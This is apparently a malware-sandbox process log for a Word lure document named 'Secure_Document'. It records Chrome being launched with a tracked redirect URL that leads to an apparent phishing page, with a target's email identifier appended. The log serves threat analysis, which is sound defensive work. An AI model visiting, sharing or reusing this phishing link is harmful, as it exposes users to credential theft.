                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx" /o ""
                                                                                                                              Imagebase:0x260000
                                                                                                                              File size:1'620'872 bytes
                                                                                                                              MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:10
                                                                                                                              Start time:11:55:37
                                                                                                                              Start date:18/11/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                                                                              Imagebase:0x7ff7d6f10000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:13
                                                                                                                              Start time:11:55:38
                                                                                                                              Start date:18/11/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1920,i,2782846156800102121,14241505822711078173,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                              Imagebase:0x7ff7d6f10000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:25
                                                                                                                              Start time:11:57:18
                                                                                                                              Start date:18/11/2024
                                                                                                                              Path:C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe" -ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca
                                                                                                                              Imagebase:0x7ff6cd8b0000
                                                                                                                              File size:18'944 bytes
                                                                                                                              MD5 hash:2474F6359B2686EBCC034214ECDA6253
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              No disassembly